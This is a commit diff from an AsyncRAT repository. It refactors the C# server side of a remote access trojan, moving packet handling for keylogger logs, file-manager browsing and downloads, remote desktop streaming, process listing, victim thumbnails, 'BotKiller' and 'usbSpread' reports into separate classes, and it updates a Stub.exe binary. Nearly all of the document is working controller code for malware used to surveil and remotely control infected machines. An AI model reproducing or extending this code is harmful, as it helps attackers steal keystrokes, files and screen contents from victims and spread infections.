Sapphire/AsyncRAT-C-Sharp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update

Browse Source 
fixed server and client stabilty
minor bugs fixes
This commit is contained in:
NYAN CAT 2019-04-30 11:12:02 -07:00
parent 9f269b053d
commit d5d60c0cb9
32 changed files with 737 additions and 576 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj
View File

@ -116,8 +116,15 @@
<Compile Include="Forms\FormDownloadFile.Designer.cs">
<DependentUpon>FormDownloadFile.cs</DependentUpon>
</Compile>
<Compile Include="Forms\HandleKeylogger.cs" />
<Compile Include="Handle Packet\HandleFileManager.cs" />
<Compile Include="Handle Packet\HandleListView.cs" />
<Compile Include="Handle Packet\HandleLogs.cs" />
<Compile Include="Handle Packet\HandlePacket.cs" />
<Compile Include="Handle Packet\HandlePing.cs" />
<Compile Include="Handle Packet\HandleRemoteDesktop.cs" />
<Compile Include="Handle Packet\HandleThumbnails.cs" />
<Compile Include="Handle Packet\Packet.cs" />
<Compile Include="Handle Packet\HandleProcessManager.cs" />
<Compile Include="Helper\Methods.cs" />
<Compile Include="MessagePack\BytesTools.cs" />
<Compile Include="MessagePack\MsgPack.cs" />

12
AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs
View File

@ -76,7 +76,7 @@ namespace AsyncRAT_Sharp
Settings.Port = portsFrm.textPorts.Text;
Settings.Password = portsFrm.textPassword.Text;
Settings.AES = new Aes256(Settings.Password);
portsFrm.Dispose();
string[] ports = Settings.Port.Split(',');
try
{
@ -317,6 +317,7 @@ namespace AsyncRAT_Sharp
}
}
formSend.Close();
formSend.Dispose();
}
catch (Exception ex)
{
@ -407,7 +408,9 @@ namespace AsyncRAT_Sharp
private void bUILDERToolStripMenuItem_Click(object sender, EventArgs e)
{
new FormBuilder().ShowDialog();
FormBuilder formBuilder = new FormBuilder();
formBuilder.ShowDialog();
formBuilder.Dispose();
}
private void fILEMANAGERToolStripMenuItem_Click(object sender, EventArgs e)
@ -557,7 +560,10 @@ namespace AsyncRAT_Sharp
private void ABOUTToolStripMenuItem_Click(object sender, EventArgs e)
{
new FormAbout().ShowDialog();
using (FormAbout formAbout = new FormAbout())
{
formAbout.ShowDialog();
}
}
private void Form1_Activated(object sender, EventArgs e)

5
AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormDownloadFile.cs
View File

@ -22,7 +22,7 @@ namespace AsyncRAT_Sharp.Forms
public Form1 F { get; set; }
internal Clients C { get; set; }
public long dSize = 0;
private void timer1_Tick(object sender, EventArgs e)
private async void timer1_Tick(object sender, EventArgs e)
{
labelsize.Text = $"{Methods.BytesToString(dSize)} \\ {Methods.BytesToString(C.BytesRecevied)}";
if (C.BytesRecevied > dSize)
@ -30,6 +30,9 @@ namespace AsyncRAT_Sharp.Forms
labelsize.Text = "Downloaded";
labelsize.ForeColor = Color.Green;
timer1.Stop();
await Task.Delay(1500);
this.Close();
}
}

36
AsyncRAT-C#/AsyncRAT-Sharp/Forms/HandleKeylogger.cs Normal file
View File

@ -0,0 +1,36 @@
using AsyncRAT_Sharp.Forms;
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using System;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
namespace AsyncRAT_Sharp.Forms
{
class HandleKeylogger
{
public HandleKeylogger(Clients client, MsgPack unpack_msgpack)
{
if (Program.form1.InvokeRequired)
{
Program.form1.BeginInvoke((MethodInvoker)(() =>
{
FormKeylogger KL = (FormKeylogger)Application.OpenForms["keyLogger:" + client.ID];
if (KL != null)
{
KL.richTextBox1.AppendText(unpack_msgpack.ForcePathObject("Log").GetAsString());
}
else
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "keyLogger";
msgpack.ForcePathObject("isON").AsString = "false";
client.BeginSend(msgpack.Encode2Bytes());
}
}));
}
}
}
}

157
AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleFileManager.cs Normal file
View File

@ -0,0 +1,157 @@
using AsyncRAT_Sharp.Forms;
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using System;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
namespace AsyncRAT_Sharp.Handle_Packet
{
public class HandleFileManager
{
public void FileManager(Clients client, MsgPack unpack_msgpack)
{
switch (unpack_msgpack.ForcePathObject("Command").AsString)
{
case "getDrivers":
{
if (Program.form1.InvokeRequired)
{
Program.form1.BeginInvoke((MethodInvoker)(() =>
{
FormFileManager FM = (FormFileManager)Application.OpenForms["fileManager:" + client.ID];
if (FM != null)
{
FM.listView1.Items.Clear();
string[] driver = unpack_msgpack.ForcePathObject("Driver").AsString.Split(new[] { "-=>" }, StringSplitOptions.None);
for (int i = 0; i < driver.Length; i++)
{
if (driver[i].Length > 0)
{
ListViewItem lv = new ListViewItem();
lv.Text = driver[i];
lv.ToolTipText = driver[i];
if (driver[i + 1] == "Fixed") lv.ImageIndex = 1;
else if (driver[i + 1] == "Removable") lv.ImageIndex = 2;
else lv.ImageIndex = 1;
FM.listView1.Items.Add(lv);
}
i += 1;
}
}
}));
}
break;
}
case "getPath":
{
if (Program.form1.InvokeRequired)
{
Program.form1.BeginInvoke((MethodInvoker)(() =>
{
FormFileManager FM = (FormFileManager)Application.OpenForms["fileManager:" + client.ID];
if (FM != null)
{
FM.listView1.Items.Clear();
FM.listView1.Groups.Clear();
string[] _folder = unpack_msgpack.ForcePathObject("Folder").AsString.Split(new[] { "-=>" }, StringSplitOptions.None);
ListViewGroup groupFolder = new ListViewGroup("Folders");
FM.listView1.Groups.Add(groupFolder);
int numFolders = 0;
for (int i = 0; i < _folder.Length; i++)
{
if (_folder[i].Length > 0)
{
ListViewItem lv = new ListViewItem();
lv.Text = _folder[i];
lv.ToolTipText = _folder[i + 1];
lv.Group = groupFolder;
lv.ImageIndex = 0;
FM.listView1.Items.Add(lv);
numFolders += 1;
}
i += 1;
}
string[] _file = unpack_msgpack.ForcePathObject("File").AsString.Split(new[] { "-=>" }, StringSplitOptions.None);
ListViewGroup groupFile = new ListViewGroup("Files");
FM.listView1.Groups.Add(groupFile);
int numFiles = 0;
for (int i = 0; i < _file.Length; i++)
{
if (_file[i].Length > 0)
{
ListViewItem lv = new ListViewItem();
lv.Text = Path.GetFileName(_file[i]);
lv.ToolTipText = _file[i + 1];
Image im = Image.FromStream(new MemoryStream(Convert.FromBase64String(_file[i + 2])));
FM.imageList1.Images.Add(_file[i + 1], im);
lv.ImageKey = _file[i + 1];
lv.Group = groupFile;
lv.SubItems.Add(Methods.BytesToString(Convert.ToInt64(_file[i + 3])));
FM.listView1.Items.Add(lv);
numFiles += 1;
}
i += 3;
}
FM.toolStripStatusLabel2.Text = $" Folder[{numFolders.ToString()}] Files[{numFiles.ToString()}]";
}
}));
}
break;
}
}
}
public void SocketDownload(Clients client, MsgPack unpack_msgpack)
{
switch (unpack_msgpack.ForcePathObject("Command").AsString)
{
case "pre":
{
if (Program.form1.InvokeRequired)
{
Program.form1.BeginInvoke((MethodInvoker)(() =>
{
string dwid = unpack_msgpack.ForcePathObject("DWID").AsString;
string file = unpack_msgpack.ForcePathObject("File").AsString;
string size = unpack_msgpack.ForcePathObject("Size").AsString;
FormDownloadFile SD = (FormDownloadFile)Application.OpenForms["socketDownload:" + dwid];
if (SD != null)
{
SD.C = client;
SD.labelfile.Text = Path.GetFileName(file);
SD.dSize = Convert.ToInt64(size);
SD.timer1.Start();
}
}));
}
break;
}
case "save":
{
if (Program.form1.InvokeRequired)
{
Program.form1.BeginInvoke((MethodInvoker)(() =>
{
string dwid = unpack_msgpack.ForcePathObject("DWID").AsString;
FormDownloadFile SD = (FormDownloadFile)Application.OpenForms["socketDownload:" + dwid];
if (SD != null)
{
if (!Directory.Exists(Path.Combine(Application.StartupPath, "ClientsFolder\\" + SD.Text.Replace("socketDownload:", ""))))
Directory.CreateDirectory(Path.Combine(Application.StartupPath, "ClientsFolder\\" + SD.Text.Replace("socketDownload:", "")));
unpack_msgpack.ForcePathObject("File").SaveBytesToFile(Path.Combine(Application.StartupPath, "ClientsFolder\\" + SD.Text.Replace("socketDownload:", "") + "\\" + unpack_msgpack.ForcePathObject("Name").AsString));
}
}));
}
break;
}
}
}
}
}

51
AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleListView.cs Normal file
View File

@ -0,0 +1,51 @@
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using cGeoIp;
using System.Drawing;
using System.Windows.Forms;
namespace AsyncRAT_Sharp.Handle_Packet
{
public class HandleListView
{
public void AddToListview(Clients client, MsgPack unpack_msgpack)
{
if (Program.form1.listView1.InvokeRequired)
{
Program.form1.listView1.BeginInvoke((MethodInvoker)(() =>
{
client.LV = new ListViewItem();
client.LV.Tag = client;
client.LV.Text = string.Format("{0}:{1}", client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0], client.ClientSocket.LocalEndPoint.ToString().Split(':')[1]);
string[] ipinf = new cGeoMain().GetIpInf(client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]).Split(':');
client.LV.SubItems.Add(ipinf[1]);
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("HWID").AsString);
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("User").AsString);
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("OS").AsString);
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Version").AsString);
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Performance").AsString);
client.LV.ToolTipText = unpack_msgpack.ForcePathObject("Path").AsString;
client.ID = unpack_msgpack.ForcePathObject("HWID").AsString;
Program.form1.listView1.Items.Insert(0, client.LV);
Program.form1.listView1.AutoResizeColumns(ColumnHeaderAutoResizeStyle.HeaderSize);
}));
lock (Settings.Online)
{
Settings.Online.Add(client);
}
new HandleLogs().Addmsg($"Client {client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} connected successfully", Color.Green);
}
}
public void Received(Clients client)
{
if (Program.form1.listView1.InvokeRequired)
{
Program.form1.listView1.BeginInvoke((MethodInvoker)(() =>
{
client.LV.ForeColor = Color.Empty;
}));
}
}
}
}

4
AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleLogs.cs
View File

@ -8,9 +8,9 @@ using System.Drawing;
namespace AsyncRAT_Sharp.Handle_Packet
{
static class HandleLogs
public class HandleLogs
{
public static void Addmsg(string Msg, Color color)
public void Addmsg(string Msg, Color color)
{
if (Program.form1.listView2.InvokeRequired)
{

396
AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandlePacket.cs
View File

@ -1,396 +0,0 @@
using AsyncRAT_Sharp.Sockets;
using System.Windows.Forms;
using AsyncRAT_Sharp.MessagePack;
using System;
using System.Diagnostics;
using System.Drawing;
using AsyncRAT_Sharp.Forms;
using System.IO;
using cGeoIp;
namespace AsyncRAT_Sharp.Handle_Packet
{
class HandlePacket
{
private static readonly cGeoMain cNewGeoUse = new cGeoMain();
public static void Read(object Obj)
{
try
{
object[] array = Obj as object[];
byte[] data = (byte[])array[0];
Clients client = (Clients)array[1];
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes(data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "ClientInfo":
if (Program.form1.listView1.InvokeRequired)
{
Program.form1.listView1.BeginInvoke((MethodInvoker)(() =>
{
client.LV = new ListViewItem();
client.LV.Tag = client;
client.LV.Text = string.Format("{0}:{1}", client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0], client.ClientSocket.LocalEndPoint.ToString().Split(':')[1]);
string[] ipinf = cNewGeoUse.GetIpInf(client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]).Split(':');
client.LV.SubItems.Add(ipinf[1]);
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("HWID").AsString);
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("User").AsString);
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("OS").AsString);
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Version").AsString);
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Performance").AsString);
client.LV.ToolTipText = unpack_msgpack.ForcePathObject("Path").AsString;
client.ID = unpack_msgpack.ForcePathObject("HWID").AsString;
Program.form1.listView1.BeginUpdate();
Program.form1.listView1.Items.Insert(0, client.LV);
Program.form1.listView1.AutoResizeColumns(ColumnHeaderAutoResizeStyle.HeaderSize);
Program.form1.listView1.EndUpdate();
}));
lock (Settings.Online)
{
Settings.Online.Add(client);
}
HandleLogs.Addmsg($"Client {client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} connected successfully", Color.Green);
}
break;
case "Ping":
{
if (Program.form1.listView1.InvokeRequired)
{
Program.form1.listView1.BeginInvoke((MethodInvoker)(() =>
{
if (client.LV != null)
{
client.LV.SubItems[Program.form1.lv_prefor.Index].Text = unpack_msgpack.ForcePathObject("Message").AsString;
}
}));
}
}
break;
case "Logs":
{
HandleLogs.Addmsg(unpack_msgpack.ForcePathObject("Message").AsString, Color.Black);
}
break;
case "thumbnails":
{
if (Program.form1.listView3.InvokeRequired)
{
Program.form1.listView3.BeginInvoke((MethodInvoker)(() =>
{
if (client.LV2 == null)
{
client.LV2 = new ListViewItem();
client.LV2.Text = string.Format("{0}:{1}", client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0], client.ClientSocket.LocalEndPoint.ToString().Split(':')[1]);
client.LV2.ToolTipText = client.ID;
using (MemoryStream memoryStream = new MemoryStream(unpack_msgpack.ForcePathObject("Image").GetAsBytes()))
{
Program.form1.imageList1.Images.Add(client.ID, Bitmap.FromStream(memoryStream));
client.LV2.ImageKey = client.ID;
Program.form1.listView3.BeginUpdate();
Program.form1.listView3.Items.Insert(0,client.LV2);
Program.form1.listView3.EndUpdate();
}
}
else
{
using (MemoryStream memoryStream = new MemoryStream(unpack_msgpack.ForcePathObject("Image").GetAsBytes()))
{
Program.form1.listView3.BeginUpdate();
Program.form1.imageList1.Images.RemoveByKey(client.ID);
Program.form1.imageList1.Images.Add(client.ID, Bitmap.FromStream(memoryStream));
Program.form1.listView3.EndUpdate();
}
}
}));
}
}
break;
case "BotKiller":
{
HandleLogs.Addmsg($"Client {client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} found {unpack_msgpack.ForcePathObject("Count").AsString} malwares and killed them successfully", Color.Orange);
}
break;
case "usbSpread":
{
HandleLogs.Addmsg($"Client {client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} found {unpack_msgpack.ForcePathObject("Count").AsString} USB drivers and spreaded them successfully", Color.Purple);
}
break;
case "Received":
{
if (Program.form1.listView1.InvokeRequired)
{
Program.form1.listView1.BeginInvoke((MethodInvoker)(() =>
{
client.LV.ForeColor = Color.Empty;
}));
}
}
break;
case "remoteDesktop":
{
if (Program.form1.InvokeRequired)
{
Program.form1.BeginInvoke((MethodInvoker)(() =>
{
FormRemoteDesktop RD = (FormRemoteDesktop)Application.OpenForms["RemoteDesktop:" + unpack_msgpack.ForcePathObject("ID").AsString];
try
{
if (RD != null)
{
if (RD.C2 == null)
{
RD.C2 = client;
RD.timer1.Start();
}
byte[] RdpStream = unpack_msgpack.ForcePathObject("Stream").GetAsBytes();
Bitmap decoded = RD.decoder.DecodeData(new MemoryStream(RdpStream));
if (RD.RenderSW.ElapsedMilliseconds >= (1000 / 20))
{
RD.pictureBox1.Image = (Bitmap)decoded;
RD.RenderSW = Stopwatch.StartNew();
}
RD.FPS++;
if (RD.sw.ElapsedMilliseconds >= 1000)
{
RD.Text = "RemoteDesktop:" + client.ID + " FPS:" + RD.FPS + " Screen:" + decoded.Width + " x " + decoded.Height + " Size:" + Methods.BytesToString(RdpStream.Length);
RD.FPS = 0;
RD.sw = Stopwatch.StartNew();
}
}
else
{
client.Disconnected();
return;
}
}
catch (Exception ex) { Debug.WriteLine(ex.Message); }
}));
}
}
break;
case "processManager":
{
if (Program.form1.InvokeRequired)
{
Program.form1.BeginInvoke((MethodInvoker)(() =>
{
FormProcessManager PM = (FormProcessManager)Application.OpenForms["processManager:" + client.ID];
if (PM != null)
{
PM.listView1.Items.Clear();
string msgUnpack = unpack_msgpack.ForcePathObject("Message").AsString;
string processLists = msgUnpack.ToString();
string[] _NextProc = processLists.Split(new[] { "-=>" }, StringSplitOptions.None);
for (int i = 0; i < _NextProc.Length; i++)
{
if (_NextProc[i].Length > 0)
{
ListViewItem lv = new ListViewItem();
lv.Text = Path.GetFileName(_NextProc[i]);
lv.SubItems.Add(_NextProc[i + 1]);
lv.ToolTipText = _NextProc[i];
Image im = Image.FromStream(new MemoryStream(Convert.FromBase64String(_NextProc[i + 2])));
PM.imageList1.Images.Add(_NextProc[i + 1], im);
lv.ImageKey = _NextProc[i + 1];
PM.listView1.Items.Add(lv);
}
i += 2;
}
}
}));
}
}
break;
case "socketDownload":
{
switch (unpack_msgpack.ForcePathObject("Command").AsString)
{
case "pre":
{
if (Program.form1.InvokeRequired)
{
Program.form1.BeginInvoke((MethodInvoker)(() =>
{
string dwid = unpack_msgpack.ForcePathObject("DWID").AsString;
string file = unpack_msgpack.ForcePathObject("File").AsString;
string size = unpack_msgpack.ForcePathObject("Size").AsString;
FormDownloadFile SD = (FormDownloadFile)Application.OpenForms["socketDownload:" + dwid];
if (SD != null)
{
SD.C = client;
SD.labelfile.Text = Path.GetFileName(file);
SD.dSize = Convert.ToInt64(size);
SD.timer1.Start();
}
}));
}
}
break;
case "save":
{
if (Program.form1.InvokeRequired)
{
Program.form1.BeginInvoke((MethodInvoker)(() =>
{
string dwid = unpack_msgpack.ForcePathObject("DWID").AsString;
FormDownloadFile SD = (FormDownloadFile)Application.OpenForms["socketDownload:" + dwid];
if (SD != null)
{
if (!Directory.Exists(Path.Combine(Application.StartupPath, "ClientsFolder\\" + SD.Text.Replace("socketDownload:", ""))))
Directory.CreateDirectory(Path.Combine(Application.StartupPath, "ClientsFolder\\" + SD.Text.Replace("socketDownload:", "")));
unpack_msgpack.ForcePathObject("File").SaveBytesToFile(Path.Combine(Application.StartupPath, "ClientsFolder\\" + SD.Text.Replace("socketDownload:", "") + "\\" + unpack_msgpack.ForcePathObject("Name").AsString));
}
}));
}
}
break;
}
break;
}
case "keyLogger":
{
if (Program.form1.InvokeRequired)
{
Program.form1.BeginInvoke((MethodInvoker)(() =>
{
FormKeylogger KL = (FormKeylogger)Application.OpenForms["keyLogger:" + client.ID];
if (KL != null)
{
KL.richTextBox1.AppendText(unpack_msgpack.ForcePathObject("Log").GetAsString());
}
else
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "keyLogger";
msgpack.ForcePathObject("isON").AsString = "false";
client.BeginSend(msgpack.Encode2Bytes());
}
}));
}
break;
}
case "fileManager":
{
switch (unpack_msgpack.ForcePathObject("Command").AsString)
{
case "getDrivers":
{
if (Program.form1.InvokeRequired)
{
Program.form1.BeginInvoke((MethodInvoker)(() =>
{
FormFileManager FM = (FormFileManager)Application.OpenForms["fileManager:" + client.ID];
if (FM != null)
{
FM.listView1.Items.Clear();
string[] driver = unpack_msgpack.ForcePathObject("Driver").AsString.Split(new[] { "-=>" }, StringSplitOptions.None);
for (int i = 0; i < driver.Length; i++)
{
if (driver[i].Length > 0)
{
ListViewItem lv = new ListViewItem();
lv.Text = driver[i];
lv.ToolTipText = driver[i];
if (driver[i + 1] == "Fixed") lv.ImageIndex = 1;
else if (driver[i + 1] == "Removable") lv.ImageIndex = 2;
else lv.ImageIndex = 1;
FM.listView1.Items.Add(lv);
}
i += 1;
}
}
}));
}
}
break;
case "getPath":
{
if (Program.form1.InvokeRequired)
{
Program.form1.BeginInvoke((MethodInvoker)(() =>
{
FormFileManager FM = (FormFileManager)Application.OpenForms["fileManager:" + client.ID];
if (FM != null)
{
FM.listView1.Items.Clear();
FM.listView1.Groups.Clear();
string[] _folder = unpack_msgpack.ForcePathObject("Folder").AsString.Split(new[] { "-=>" }, StringSplitOptions.None);
ListViewGroup groupFolder = new ListViewGroup("Folders");
FM.listView1.Groups.Add(groupFolder);
int numFolders = 0;
for (int i = 0; i < _folder.Length; i++)
{
if (_folder[i].Length > 0)
{
ListViewItem lv = new ListViewItem();
lv.Text = _folder[i];
lv.ToolTipText = _folder[i + 1];
lv.Group = groupFolder;
lv.ImageIndex = 0;
FM.listView1.Items.Add(lv);
numFolders += 1;
}
i += 1;
}
string[] _file = unpack_msgpack.ForcePathObject("File").AsString.Split(new[] { "-=>" }, StringSplitOptions.None);
ListViewGroup groupFile = new ListViewGroup("Files");
FM.listView1.Groups.Add(groupFile);
int numFiles = 0;
for (int i = 0; i < _file.Length; i++)
{
if (_file[i].Length > 0)
{
ListViewItem lv = new ListViewItem();
lv.Text = Path.GetFileName(_file[i]);
lv.ToolTipText = _file[i + 1];
Image im = Image.FromStream(new MemoryStream(Convert.FromBase64String(_file[i + 2])));
FM.imageList1.Images.Add(_file[i + 1], im);
lv.ImageKey = _file[i + 1];
lv.Group = groupFile;
lv.SubItems.Add(Methods.BytesToString(Convert.ToInt64(_file[i + 3])));
FM.listView1.Items.Add(lv);
numFiles += 1;
}
i += 3;
}
FM.toolStripStatusLabel2.Text = $" Folder[{numFolders.ToString()}] Files[{numFiles.ToString()}]";
}
}));
}
}
break;
}
break;
}
}
}
catch (Exception ex)
{
Debug.WriteLine(ex.Message);
}
//GC.Collect();
//GC.WaitForPendingFinalizers();
}
}
}

23
AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandlePing.cs Normal file
View File

@ -0,0 +1,23 @@
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using System.Windows.Forms;
namespace AsyncRAT_Sharp.Handle_Packet
{
public class HandlePing
{
public HandlePing(Clients client, MsgPack unpack_msgpack)
{
if (Program.form1.listView1.InvokeRequired)
{
Program.form1.listView1.BeginInvoke((MethodInvoker)(() =>
{
if (client.LV != null)
{
client.LV.SubItems[Program.form1.lv_prefor.Index].Text = unpack_msgpack.ForcePathObject("Message").AsString;
}
}));
}
}
}
}

45
AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleProcessManager.cs Normal file
View File

@ -0,0 +1,45 @@
using AsyncRAT_Sharp.Forms;
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using System;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
namespace AsyncRAT_Sharp.Handle_Packet
{
public class HandleProcessManager
{
public void GetProcess(Clients client, MsgPack unpack_msgpack)
{
if (Program.form1.InvokeRequired)
{
Program.form1.BeginInvoke((MethodInvoker)(() =>
{
FormProcessManager PM = (FormProcessManager)Application.OpenForms["processManager:" + client.ID];
if (PM != null)
{
PM.listView1.Items.Clear();
string processLists = unpack_msgpack.ForcePathObject("Message").AsString;
string[] _NextProc = processLists.Split(new[] { "-=>" }, StringSplitOptions.None);
for (int i = 0; i < _NextProc.Length; i++)
{
if (_NextProc[i].Length > 0)
{
ListViewItem lv = new ListViewItem();
lv.Text = Path.GetFileName(_NextProc[i]);
lv.SubItems.Add(_NextProc[i + 1]);
lv.ToolTipText = _NextProc[i];
Image im = Image.FromStream(new MemoryStream(Convert.FromBase64String(_NextProc[i + 2])));
PM.imageList1.Images.Add(_NextProc[i + 1], im);
lv.ImageKey = _NextProc[i + 1];
PM.listView1.Items.Add(lv);
}
i += 2;
}
}
}));
}
}
}
}

57
AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleRemoteDesktop.cs Normal file
View File

@ -0,0 +1,57 @@
using AsyncRAT_Sharp.Forms;
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using System;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
namespace AsyncRAT_Sharp.Handle_Packet
{
public class HandleRemoteDesktop
{
public void Capture(Clients client, MsgPack unpack_msgpack)
{
if (Program.form1.InvokeRequired)
{
Program.form1.BeginInvoke((MethodInvoker)(() =>
{
FormRemoteDesktop RD = (FormRemoteDesktop)Application.OpenForms["RemoteDesktop:" + unpack_msgpack.ForcePathObject("ID").AsString];
try
{
if (RD != null)
{
if (RD.C2 == null)
{
RD.C2 = client;
RD.timer1.Start();
}
byte[] RdpStream = unpack_msgpack.ForcePathObject("Stream").GetAsBytes();
Bitmap decoded = RD.decoder.DecodeData(new MemoryStream(RdpStream));
if (RD.RenderSW.ElapsedMilliseconds >= (1000 / 20))
{
RD.pictureBox1.Image = (Bitmap)decoded;
RD.RenderSW = Stopwatch.StartNew();
}
RD.FPS++;
if (RD.sw.ElapsedMilliseconds >= 1000)
{
RD.Text = "RemoteDesktop:" + client.ID + " FPS:" + RD.FPS + " Screen:" + decoded.Width + " x " + decoded.Height + " Size:" + Methods.BytesToString(RdpStream.Length);
RD.FPS = 0;
RD.sw = Stopwatch.StartNew();
}
}
else
{
client.Disconnected();
return;
}
}
catch (Exception ex) { Debug.WriteLine(ex.Message); }
}));
}
}
}
}

45
AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleThumbnails.cs Normal file
View File

@ -0,0 +1,45 @@
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
namespace AsyncRAT_Sharp.Handle_Packet
{
public class HandleThumbnails
{
public HandleThumbnails(Clients client, MsgPack unpack_msgpack)
{
if (Program.form1.listView3.InvokeRequired)
{
Program.form1.listView3.BeginInvoke((MethodInvoker)(() =>
{
if (client.LV2 == null)
{
client.LV2 = new ListViewItem();
client.LV2.Text = string.Format("{0}:{1}", client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0], client.ClientSocket.LocalEndPoint.ToString().Split(':')[1]);
client.LV2.ToolTipText = client.ID;
using (MemoryStream memoryStream = new MemoryStream(unpack_msgpack.ForcePathObject("Image").GetAsBytes()))
{
Program.form1.imageList1.Images.Add(client.ID, Bitmap.FromStream(memoryStream));
client.LV2.ImageKey = client.ID;
Program.form1.listView3.BeginUpdate();
Program.form1.listView3.Items.Insert(0, client.LV2);
Program.form1.listView3.EndUpdate();
}
}
else
{
using (MemoryStream memoryStream = new MemoryStream(unpack_msgpack.ForcePathObject("Image").GetAsBytes()))
{
Program.form1.listView3.BeginUpdate();
Program.form1.imageList1.Images.RemoveByKey(client.ID);
Program.form1.imageList1.Images.Add(client.ID, Bitmap.FromStream(memoryStream));
Program.form1.listView3.EndUpdate();
}
}
}));
}
}
}
}

105
AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/Packet.cs Normal file
View File

@ -0,0 +1,105 @@
using AsyncRAT_Sharp.Sockets;
using AsyncRAT_Sharp.MessagePack;
using System;
using System.Diagnostics;
using System.Drawing;
using AsyncRAT_Sharp.Forms;
namespace AsyncRAT_Sharp.Handle_Packet
{
public static class Packet
{
public static void Read(object Obj)
{
try
{
object[] array = Obj as object[];
byte[] data = (byte[])array[0];
Clients client = (Clients)array[1];
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes(data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "ClientInfo":
{
new HandleListView().AddToListview(client, unpack_msgpack);
break;
}
case "Ping":
{
new HandlePing(client, unpack_msgpack);
break;
}
case "Logs":
{
new HandleLogs().Addmsg(unpack_msgpack.ForcePathObject("Message").AsString, Color.Black);
break;
}
case "thumbnails":
{
new HandleThumbnails(client, unpack_msgpack);
break;
}
case "BotKiller":
{
new HandleLogs().Addmsg($"Client {client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} found {unpack_msgpack.ForcePathObject("Count").AsString} malwares and killed them successfully", Color.Orange);
break;
}
case "usbSpread":
{
new HandleLogs().Addmsg($"Client {client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} found {unpack_msgpack.ForcePathObject("Count").AsString} USB drivers and spreaded them successfully", Color.Purple);
break;
}
case "Received":
{
new HandleListView().Received(client);
break;
}
case "remoteDesktop":
{
new HandleRemoteDesktop().Capture(client, unpack_msgpack);
break;
}
case "processManager":
{
new HandleProcessManager().GetProcess(client, unpack_msgpack);
break;
}
case "socketDownload":
{
new HandleFileManager().SocketDownload(client, unpack_msgpack);
break;
}
case "keyLogger":
{
new HandleKeylogger(client, unpack_msgpack);
break;
}
case "fileManager":
{
new HandleFileManager().FileManager(client, unpack_msgpack);
break;
}
}
}
catch (Exception ex)
{
Debug.WriteLine(ex.Message);
}
//GC.Collect();
//GC.WaitForPendingFinalizers();
}
}
}

1
AsyncRAT-C#/AsyncRAT-Sharp/Helper/Methods.cs
View File

@ -24,7 +24,6 @@ namespace AsyncRAT_Sharp
await Task.Delay(interval);
o.Opacity += 0.05;
}
o.Opacity = 1;
}
}
}

BIN
AsyncRAT-C#/AsyncRAT-Sharp/Resources/Stub.exe
View File

Binary file not shown.

2
AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs
View File

@ -14,6 +14,6 @@ namespace AsyncRAT_Sharp
public static string Password { get; set; }
public static Aes256 AES{ get; set; }
public static readonly string Version = "AsyncRAT 0.4.2";
public static readonly string Version = "AsyncRAT 0.4.3";
}
}

8
AsyncRAT-C#/AsyncRAT-Sharp/Socket/Clients.cs
View File

@ -11,7 +11,7 @@ using AsyncRAT_Sharp.MessagePack;
namespace AsyncRAT_Sharp.Sockets
{
class Clients
public class Clients
{
public Socket ClientSocket { get; set; }
public ListViewItem LV { get; set; }
@ -23,7 +23,7 @@ namespace AsyncRAT_Sharp.Sockets
private MemoryStream ClientMS { get; set; }
public object SendSync { get; } = new object();
